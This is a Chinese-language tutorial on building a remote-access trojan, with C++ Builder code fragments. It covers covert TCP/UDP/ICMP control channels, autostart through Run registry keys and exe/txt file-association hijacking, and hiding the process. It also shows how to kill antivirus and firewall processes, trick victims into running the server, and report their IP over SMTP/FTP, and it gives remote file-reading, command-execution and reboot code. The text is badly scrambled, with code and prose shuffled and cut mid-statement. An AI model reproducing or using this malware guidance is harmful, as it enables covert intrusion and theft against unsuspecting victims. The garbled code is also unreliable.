【正文】 通過這種方法壓縮處理過的數(shù)據(jù)，變得十分小，甚至在屏幕沒有改變的情況下，傳送的數(shù)據(jù)量為0，在這里不做過多分析了，有興趣的朋友，可以多看看。CopyScreen,sizeof(CopyScreenUInt))。=ChangedNum。}while(MaxCNum0)。msWrite(amp。=TRect(num1,num2,num3,num4)。}}}TMemoryStream *ms。if (CNumMaxCNum) MaxCNum=CNum。num3++){MaxCNum=0。do{for (num1=0。msWrite(amp。//************************jQuality=Qlity。int m。int ChangedNum=0。num3 Colors[num1][num2][num3]=bmCanvasPixels[nowx+Dests[num3].x][nowy+Dests[num3].y]。for (num2=0。bool Change。bmHeight=Sh。}//收到刷屏消息后只執(zhí)行:CatchScreen(DNum,Qlity)。for (int num1=0。Sw=ScreenWidth。int Dnum。int xCount。COLORREF BakColors[MAXXCount]{MAXYCount][DestNum]。break。else{CNumBak=msgCNum。NMUDP1ReadStream(RData)。break。case 1:RDataRead(netbiosname,sizeof(NetBiosName))。else{CNumBak=msgCNum。RDataRead(msg,sizeof(Msg))。為消息操作號，它的作用是為了效驗數(shù)據(jù)是否是發(fā)送過的，經(jīng)過分析而知，我們熟悉的OICQ也正是使用了這一辦法來校驗消息的。define MsgSetProgramOpenUintLen sizeof(MsgSetProgramOpenUint)define MsgGetHardWare 35//請求硬件信息(UDP消息)和回傳硬件信息(TCP消息)　　上面一段定義，使用了TCP和UDP兩種協(xié)議目的就是為了減少TCP連接的幾率，這樣所消耗的系統(tǒng)資源就會比較少，不容易讓目標機察覺。//old struct : char ProgramName[128]。}MsgSetTaskBarStatUint。}SMsg。 //定義消息結構char SType。define MsgChatLen sizeof(MsgChatUint)//消息單元長度////重啟數(shù)據(jù)包定義：////定義如下消息類型：define MsgReBoot 15//重啟事件////目錄結構請求數(shù)據(jù)包定義：////定義如下消息類型：define MsgGetDirInfo 17define MsgReceiveGetDirInfo 18typedef struct{char Dir[4096]。//對話框消息內容}MsgDlgUint。//消息操作號//int Length。//消息種類char Password[20]。木馬程序，為了避免被發(fā)現(xiàn)，必須很好的控制數(shù)據(jù)傳輸量，一個編制較好的木馬，往往有自己的一套傳輸協(xié)議，那么程序上，到底是如何組織實現(xiàn)的呢？下面，我舉例包裝一些協(xié)議：typedef struct{另外一種辦法，是使用ICMP（Internet Control Message Protocol）協(xié)議進行數(shù)據(jù)的發(fā)送,原理是修改ICMP頭的構造，加入木馬的控制字段，這樣的木馬，具備很多新的特點，不占用端口的特點，使用戶難以發(fā)覺，同時，使用ICMP可以穿透一些防火墻，從而增加了防范的難度。reg。(Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run,true)。}}while(Suc== ERROR_SUCCESS)RegCloseKey(hkey)。k)。unsigned long k?！　　　　　f (strcmp(str,BGroup)==0){　　　　　　　　　　　　DeleteFile(AnsiString(strv))。DWORD Suc。char strv[255]。}自裝載程序的卸載代碼：int num。　　　　　　vl)。vl=254。DWORD type。RegSetValueEx(hkey,BackGroup,0,REG_SZ,(),())?！　　　=REG_OPENED_EXISTING_KEY。if (int(ShellExecute(Handle,open,(),NULL,NULL,SW_HIDE))32){WantClose=true。hkey,amp。}程序的自加載運行技術　　讓程序自運行的方法比較多，除了最常見的方法：加載程序到啟動組，寫程序啟動路徑到注冊表的HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersions\\Run的方法外，還有很多其他的辦法，據(jù)yagami講，還有幾十種方法之多，或者通過注冊表里的輸入法鍵值直接掛接啟動，真的可以說是防不勝防，下面展示一段通過修改HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersions\\Run鍵值來實現(xiàn)自啟動的程序：　　自裝載部分：HKEY hkey?！　?/找到RegisterServiceProcess的入口　　　　　　　　　　rsp(NULL,1)?！　　　　　　　《@個應用程序對于系統(tǒng)來說，是一個絕對安全的程序，這樣，就達到了徹底隱藏的效果，這樣的結果，導致了查殺黑客程序難度的增加。因為許多木馬打開的就是高端端口（如本例中的4444）。陷阱，另一個我不太肯定，但聽說有程序使用的方法：用CRC校驗你的EXE文件，如果它被改變了，不要顯示典型錯誤信息，而給予偷竊者致命的一擊。如果有人試圖將你的木馬程序反匯編，他成功后，你的一切秘密就暴露在他的面前了，因此，我們要想辦法保護自己的作品。因此最好的辦法是啟動后立即分析當前進程，查找有沒有常見防火墻和殺毒軟件的進程，如果有就殺無赦。木馬的功能還可以大大擴充。具體鍵值如：　　與exe文件建立關聯(lián)：HKEY_CLASSES_ROOT\\exefile\\shell\\open\\mand　　與txt文件建立關聯(lián)：HKEY_CLASSES_ROOT\\txtfile\\shell\\open\\mand　　與dll文件建立關聯(lián)：HKEY_CLASSES_ROOT\\dllfile\\shell\\open\\mand等，當然還可以自己擴充。、也還是那幾個注冊表鍵值，如：HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunHKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run都已被其他的木馬用爛了?！　〗酉聛砭桶裇erver程序寄給受害者，誘騙他（她）執(zhí)行，在你得到他（她）的IP后（這不用我教吧？），就啟動Client程序，敲入“edit conf 1”，敲入“edit conf 2”，敲入“dir xxx”（xxx是目錄名）就可以看到目錄和文件，敲“type xxx”就可以察看任何文件，輸入“open”，彈出目標機的光驅托盤，“close”就收入托盤，輸入“swap”就可以交換受害者的鼠標左右鍵，輸入“reboot”就啟動目標機……不用我多說了吧？　　以上只是一個簡單的例子，真正寫起木馬來要解決的技術問題比這多得多，這得需要扎實的編程功底和豐富的經(jīng)驗?！?/關閉之　Edit4〉Lines〉LoadFromFile（）。　//清空編輯框　FILE *fp?！　?/連接！}選中CilentSocket1控件，雙擊OnConnectt事件，在ClientSocket1Connect下添加如下代碼：{　if（（Edit1〉Text==edit conf 1）||（Edit1〉Text==edit conf 2））　//　　Socket〉SendText（Edit1〉Text+Edit4〉Text）。（頭是不是有點大了？！）　　雙擊Button1，在Button1Click事件中添加如下代碼：{　　if（（Edit2〉Text==）||（Edit3〉Text==））return。最后別忘了要在此服務器源碼文件中添加以下頭文件：include 〈〉include 〈〉include 〈〉include 〈〉include 〈sys\\〉include 〈〉include 〈〉include 〈〉include 〈〉include 〈〉　　至此，服務器端（Server）程序已全部完工?。ńK于可以好好歇歇了?。﹦e慌！以上代碼只是完成了整個木馬程序的一半?！?/寫入以上的SendToSite的內容　fclose（Upload）?！　　?//返回　　}　AnsiString SendToSite = Server Running on: + NMFTP1〉RemoteIP?！?/FTP端口號，一般為21　NMFTP1〉Password = 。　//發(fā)送！　return?！?/受害者的名字　NMSMTP1〉PostMessage〉ToAddress〉Text = crossbow?！　?/再次連接　}　catch（...）　{　　goto NextTime。　//再次打開服務　if （NMSMTP1〉Connected） NMSMTP1〉Disconnect（）。　　　　到此，服務器程序的功能已全部完成，但還差容錯部分未完成，這樣才能避免程序因意外而崩潰?！　?/寫入換行符　　fclose（fp）?！　　　?/計數(shù)器加1　　　if（times_of_try100）　　　{　　　　SocketSendText（Fail By Open File）。　　　//強行退出Win9x并重啟}}如果以上都不是，就讓它在Dos窗口中執(zhí)行傳來的命令：{else{　　//如果都不是　　char * CR_TF=\\n?！　　　djustTokenPrivileges（hToken， FALSE， amp?！　　?/OpenProcessToken（）這個函數(shù)的作用是打開一個進程的訪問令牌　　　//GetCurrentProcess（）函數(shù)的作用是得到本進程的句柄　　　LookupPrivilegeValue（NULL， SE_SHUTDOWN_NAME，amp。　　//得到操作系統(tǒng)的版本號　　if （dwVersion 0x80000000）　　{　　　　//操作系統(tǒng)是WinNt，不是Win9x　　　HANDLE hToken?！　?/就收入光驅的托盤?！　?/Return_Text的內容加上剛才的字符　　fclose（fp）。\\0\39。　　//從目標文件中讀入前300個字符　　while（Read_Num==300）　　　{　　　　Return_Text=Return_Text+temp_content。i300?！　　　　　?/返回“Fail By Open File”的錯誤信息　　　　　　goto END?！　?/將目標文件流存入File_Name變量中　　times_of_try=0。夠長吧？！察看目錄樹這么費勁??？！。　　　 //Return_Text變量加上剛才的300個字符　　　 fclose（fp1）。\\0\39?！　　?//從目標文件中讀入前300個字符　　　 while（Read_Num==300）　　　 {　　　　 Return_Text=Return_Text+temp_content。i300。　　　　　　 //就發(fā)回“Fail By Open File”的錯誤信息　　　　　　 goto END。　　　 times_of_try=0。　　　　 //將目錄名寫入目標文件　　　　 fwrite（CR_LF，1，1，fp）?！　　　　?/失敗則寫入空格　　　　 if （attrib amp?！　　　　?/將目標文件屬性設為系統(tǒng)　　　　 else　　　　　fwrite（